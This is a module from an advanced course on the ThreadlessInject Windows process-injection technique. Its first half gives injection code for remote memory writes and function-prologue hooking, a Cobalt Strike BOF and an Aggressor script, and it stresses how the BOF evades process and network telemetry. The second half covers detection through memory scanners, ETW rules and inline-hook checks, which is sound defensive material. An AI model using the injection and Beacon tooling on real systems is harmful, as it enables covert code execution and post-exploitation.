Difficulty: Advanced

Module 8: Full Chain, BOF Integration & Detection

The complete flow from target selection to payload execution, plus how defenders catch it.

Putting It All Together

This final module walks through the entire ThreadlessInject chain end-to-end, demonstrates how it integrates with Cobalt Strike as a Beacon Object File (BOF), and then switches perspective to the defender to examine every detection opportunity across the kill chain. Understanding both sides is essential for building effective offensive tools and for conducting realistic detection engineering.

The Complete Injection Chain

Here is the full sequence of operations that ThreadlessInject performs, from start to finish. Each step references the module where it was covered in detail:

ThreadlessInject: End-to-End Flow

Step 1: Open target process handle (PROCESS_VM_OPERATION | VM_WRITE | VM_READ)
Step 2: Resolve target function address (GetProcAddress for system DLLs)
Step 3: Read original 14 bytes from target function (NtReadVirtualMemory)
Step 4: Allocate RW memory in target process (NtAllocateVirtualMemory)
Step 5: Build hook stub + shellcode + trampoline locally
Step 6: Write payload to remote allocation (NtWriteVirtualMemory)
Step 7: Change remote allocation protection: RW → RX
Step 8: Change target function protection: RX → RWX
Step 9: Overwrite function prologue with 14-byte JMP (NtWriteVirtualMemory)
Step 10: Restore target function protection: RWX → RX
Step 11: Wait for trigger — existing thread calls hooked function
Step 12: Shellcode executes, guard is set, original bytes restored
C++// ThreadlessInject: Complete implementation pseudocode
bool ThreadlessInject(DWORD pid, const char* dllName, const char* funcName,
                      BYTE* shellcode, SIZE_T shellcodeLen) {

    // Step 1: Open target process
    HANDLE hProc = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, pid);
    if (!hProc) return false;

    // Step 2: Resolve target function address
    HMODULE hDll = GetModuleHandleA(dllName);
    FARPROC funcAddr = GetProcAddress(hDll, funcName);

    // Step 3: Read original bytes
    BYTE originalBytes[14];
    NtReadVirtualMemory(hProc, funcAddr, originalBytes, 14, NULL);

    // Step 4: Calculate total size and allocate remote memory
    SIZE_T stubSize = CalculateStubSize();
    SIZE_T totalSize = stubSize + shellcodeLen + 14 + 14 + 4; // stub+sc+orig+jmpback+guard
    PVOID remoteMem = NULL;
    NtAllocateVirtualMemory(hProc, &remoteMem, 0, &totalSize,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Step 5: Build complete payload locally
    BYTE* payload = BuildPayload(remoteMem, funcAddr, shellcode,
        shellcodeLen, originalBytes);

    // Step 6: Write to remote process
    NtWriteVirtualMemory(hProc, remoteMem, payload, totalSize, NULL);

    // Step 7: Change payload protection to RX
    ULONG oldProt;
    NtProtectVirtualMemory(hProc, &remoteMem, &totalSize,
        PAGE_EXECUTE_READ, &oldProt);

    // Step 8-10: Install the hook (change prot, write JMP, restore prot)
    BYTE hookJmp[14];
    BuildAbsoluteJmp(hookJmp, (UINT64)remoteMem);  // JMP to hook stub

    PVOID funcPage = (PVOID)funcAddr;
    SIZE_T pageSize = 14;
    NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
        PAGE_EXECUTE_READWRITE, &oldProt);
    NtWriteVirtualMemory(hProc, funcAddr, hookJmp, 14, NULL);
    NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
        oldProt, &oldProt);

    // Steps 11-12 happen asynchronously in the target process
    printf("[+] Hook installed. Waiting for target thread to trigger...\n");

    // Optionally: monitor guard flag and restore original bytes
    CloseHandle(hProc);
    free(payload);
    return true;
}

Cobalt Strike BOF Integration

A Beacon Object File (BOF) is a compiled C object file (.o) that Cobalt Strike can load and execute directly within the Beacon process. BOFs are used for post-exploitation actions because they run in-process (no new process creation) and can use the Beacon's existing communication channel. A BOF implementation of ThreadlessInject was created by iilegacyyii (Jordan Jay) as a community port of CCob's original C# technique, allowing operators to perform threadless injection from a Cobalt Strike Beacon.

BOF Architecture

BOFs use a special API provided by Cobalt Strike's Beacon runtime. They cannot use the standard C runtime library (no printf, malloc, etc.). Instead, they use Beacon API functions for output, memory management, and dynamic function resolution:

C// BOF entry point for ThreadlessInject
// Uses Beacon's Dynamic Function Resolution (DFR) for API calls

#include "beacon.h"

// Declare the Windows APIs we need via DFR
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

// NTDLL native APIs
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtAllocateVirtualMemory(HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtWriteVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtProtectVirtualMemory(HANDLE, PVOID*, PSIZE_T, ULONG, PULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtReadVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);

void go(char* args, int alen) {
    // Parse arguments from Cobalt Strike
    datap parser;
    BeaconDataParse(&parser, args, alen);
    int pid = BeaconDataInt(&parser);
    char* dllName = BeaconDataExtract(&parser, NULL);
    char* funcName = BeaconDataExtract(&parser, NULL);
    int scLen = 0;
    char* shellcode = BeaconDataExtract(&parser, &scLen);

    BeaconPrintf(CALLBACK_OUTPUT,
        "[*] ThreadlessInject: PID=%d, DLL=%s, Func=%s, SC=%d bytes",
        pid, dllName, funcName, scLen);

    // Execute the threadless injection chain
    // (same logic as standalone, using DFR API calls)
    HANDLE hProc = KERNEL32$OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, pid);

    if (!hProc) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open process %d", pid);
        return;
    }

    // ... (complete injection chain using NTDLL$ prefixed functions)

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Hook installed successfully");
}

Aggressor Script Integration

The BOF is loaded into Cobalt Strike via an Aggressor script that defines a new command for the operator:

Aggressor# ThreadlessInject Aggressor script
# Registers the 'threadlessinject' command in Cobalt Strike

alias threadlessinject {
    local('$pid $dll $func $shellcode $bof');

    $pid  = $2;   # Target PID
    $dll  = $3;   # DLL containing target function
    $func = $4;   # Export function name to hook

    # Generate shellcode for the target architecture
    $shellcode = shellcode($1, false, "x64");

    # Read the compiled BOF
    $bof = readbof("ThreadlessInject.o");

    # Pack arguments and execute the BOF
    btask($1, "Threadless Inject into PID $pid via $dll!$func");
    beacon_inline_execute($1, $bof, "go",
        bof_pack($1, "izzb", $pid, $dll, $func, $shellcode));
}

# Usage from Cobalt Strike console:
# threadlessinject 1234 ntdll.dll NtWaitForSingleObject

BOF Advantages

Running ThreadlessInject as a BOF has significant operational advantages. The BOF runs inside the existing Beacon process, so there is no new process creation (which would trigger PsSetCreateProcessNotifyRoutine callbacks). The BOF uses Beacon's in-memory execution, so there is no file written to disk. And because the BOF communicates results back through Beacon's existing C2 channel, there is no new network connection to create or monitor.

Detection Vectors

Now we switch to the defender's perspective. While ThreadlessInject avoids thread creation telemetry, it is not invisible. Here are the detection opportunities at each stage of the kill chain:

StageDetection MethodTelemetry SourceDifficulty
OpenProcessCross-process handle with VM rightsObRegisterCallbacks (kernel)Medium
NtAllocateVirtualMemoryRemote allocation of private memoryETW: Microsoft-Windows-Kernel-MemoryMedium
NtWriteVirtualMemoryCross-process memory writeETW: Microsoft-Windows-Kernel-MemoryMedium
NtProtectVirtualMemoryRW→RX transition on private memoryETW: VirtualProtect eventsHigh (many false positives)
Prologue overwriteModified DLL code page (COW violation)Memory scanning, page hash comparisonHigh
Hook stub in memoryRX private memory with no backing imageMemory scanning (Moneta, pe-sieve)Medium
Modified function entryInline hook detection on known exportsHook scanning (HookShark, etc.)Medium

Memory Scanning Detection

Memory scanners like Moneta and pe-sieve are among the most effective detection tools against ThreadlessInject. They detect two key artifacts:

1. Unbacked Executable Memory

ThreadlessInject allocates private memory (not backed by a DLL file) and marks it as executable. Memory scanners enumerate all memory regions and flag any that are executable but not backed by a known image file on disk. This is the hook stub + shellcode region.

C++// What Moneta detects:
// Region at 0x00000213A0010000:
//   Type: MEM_PRIVATE (not backed by a file)
//   Protection: PAGE_EXECUTE_READ
//   Size: 4096 bytes
//   Backing: NONE (no image file)
//   VERDICT: Suspicious - private executable memory without backing image

// Defender query using Moneta:
// moneta64.exe -p <target_pid>
// Output shows all private executable regions that have no backing DLL/EXE

2. Modified Code Pages (Copy-on-Write)

When ThreadlessInject overwrites the target function's prologue, it triggers a copy-on-write (COW) fault. DLL code pages are normally shared across all processes (mapped from the same physical memory). When one process writes to a shared page, Windows creates a private copy for that process. Scanners like pe-sieve detect these private copies by comparing the in-memory code with the on-disk DLL file. Any differences indicate code modification (i.e., a hook).

pe-sieve Detection

Running pe-sieve against the target process after ThreadlessInject is installed will show a hook detected alert on the target DLL. The tool compares the in-memory bytes of every loaded DLL against the on-disk file and reports any discrepancies. The 14-byte modification at the target function's entry point is immediately flagged. Even after the hook is cleaned up (original bytes restored), the COW page may still exist (though its contents will match the on-disk file again).

ETW-Based Detection

Event Tracing for Windows provides several relevant providers for detecting ThreadlessInject's operations:

C++// Key ETW providers for detection:

// 1. Microsoft-Windows-Kernel-Process
//    Events: ProcessStart, ThreadStart
//    ThreadlessInject avoidance: No ThreadStart event (no new thread!)
//    But: OpenProcess events are still logged

// 2. Microsoft-Windows-Kernel-Memory
//    Events: VirtualAlloc, VirtualProtect cross-process
//    Detection: Remote VirtualAlloc + VirtualProtect sequence
//    Pattern: NtAllocateVirtualMemory(remoteHandle, ..., PAGE_READWRITE)
//             followed by NtProtectVirtualMemory(..., PAGE_EXECUTE_READ)

// 3. Microsoft-Windows-Threat-Intelligence (TI provider)
//    Requires PPL (Protected Process Light) to access
//    Events: NtWriteVirtualMemory, NtProtectVirtualMemory cross-process
//    This is the most comprehensive source but requires kernel-level access

// Detection rule pseudocode:
// IF process_A calls NtAllocateVirtualMemory on process_B
//    AND process_A calls NtWriteVirtualMemory on process_B
//    AND process_A calls NtProtectVirtualMemory on process_B (RW->RX)
//    AND NO NtCreateThreadEx or CreateRemoteThread follows
// THEN: Possible threadless injection (high confidence)

Inline Hook Detection

Dedicated hook detection tools scan all loaded DLLs for inline hooks by examining the first bytes of exported functions. A JMP instruction at the very beginning of a function (especially to private memory) is a strong indicator of an inline hook:

C++// Simple inline hook detection: check first bytes of exported functions
bool DetectInlineHook(HMODULE hModule, const char* funcName) {
    FARPROC funcAddr = GetProcAddress(hModule, funcName);
    if (!funcAddr) return false;

    BYTE* bytes = (BYTE*)funcAddr;

    // Check for JMP [RIP+0] pattern: FF 25 00 00 00 00
    if (bytes[0] == 0xFF && bytes[1] == 0x25 &&
        *(DWORD*)(bytes + 2) == 0) {
        UINT64 target = *(UINT64*)(bytes + 6);
        // Check if jump target is in private (non-image) memory
        MEMORY_BASIC_INFORMATION mbi;
        VirtualQuery((PVOID)target, &mbi, sizeof(mbi));
        if (mbi.Type == MEM_PRIVATE) {
            printf("[!] HOOK DETECTED: %s -> 0x%llx (private memory)\n",
                   funcName, target);
            return true;
        }
    }

    // Check for relative JMP: E9 xx xx xx xx
    if (bytes[0] == 0xE9) {
        INT32 offset = *(INT32*)(bytes + 1);
        UINT64 target = (UINT64)funcAddr + 5 + offset;
        // Similar private memory check...
    }

    return false;
}

Detection Engineering Summary

Detection Coverage Map

Strongest Detection: Memory scanning (pe-sieve, Moneta) for modified code pages and unbacked RX memory
Good Detection: ETW TI provider for cross-process NtWriteVirtualMemory + NtProtectVirtualMemory
Good Detection: Inline hook scanning on loaded DLL exports
Partial Detection: ObRegisterCallbacks for suspicious cross-process handle access
Not Detected: Thread creation callbacks (no thread created)
Not Detected: ETW ThreadStart events (no thread created)

Key Takeaway for Defenders

ThreadlessInject eliminates the thread creation signal, which was the easiest and most reliable detection for traditional injection. However, it cannot eliminate the need for cross-process memory operations (allocate, write, protect) or the resulting memory artifacts (unbacked executable memory, modified code pages). Detection strategies should focus on (1) memory scanning for private executable regions, (2) ETW monitoring for cross-process VirtualProtect patterns (especially RW→RX), and (3) periodic inline hook verification on critical system DLL exports.

Related Techniques

ThreadlessInject is part of a family of advanced injection techniques that avoid thread creation. PoolParty by SafeBreach uses Windows thread pool work items for execution. Mockingjay by SecurityJoes uses existing RWX sections in vulnerable DLLs to avoid memory allocation entirely. Understanding ThreadlessInject provides the foundation for understanding these related techniques, as they all address the same fundamental problem: triggering code execution without the detectable act of creating a thread.

Course Complete

You have completed the ThreadlessInject Masterclass. You now understand how threadless injection works at every level: from the detection problems with traditional injection, through the mechanics of remote function hooking, to the byte-level construction of hook stubs and the detection engineering perspective. Apply this knowledge responsibly.

Pop Quiz: Full Chain & Detection

Q1: Which detection method is MOST effective against ThreadlessInject?

ThreadlessInject creates no new threads, so thread-based detection is completely blind. Memory scanning tools (Moneta, pe-sieve) detect both the unbacked executable memory (hook stub + shellcode) and the modified DLL code pages (copy-on-write from overwriting the function prologue). These artifacts exist regardless of whether threads are created.

Q2: What is the primary advantage of running ThreadlessInject as a Cobalt Strike BOF?

BOFs execute within the Beacon process's memory space. There is no new process created (avoiding PsSetCreateProcessNotifyRoutine callbacks), no file written to disk (the object file is loaded in memory), and results are communicated through Beacon's existing C2 channel. This significantly reduces the operational footprint.

Q3: What causes a copy-on-write (COW) fault that pe-sieve can detect?

DLL code pages are shared physical memory mapped into multiple processes. When ThreadlessInject writes the hook JMP over the function prologue, Windows performs a copy-on-write: it creates a private physical page for this process with the modified bytes. pe-sieve detects this by comparing the in-memory bytes with the original on-disk DLL file — the 14 modified bytes are immediately visible.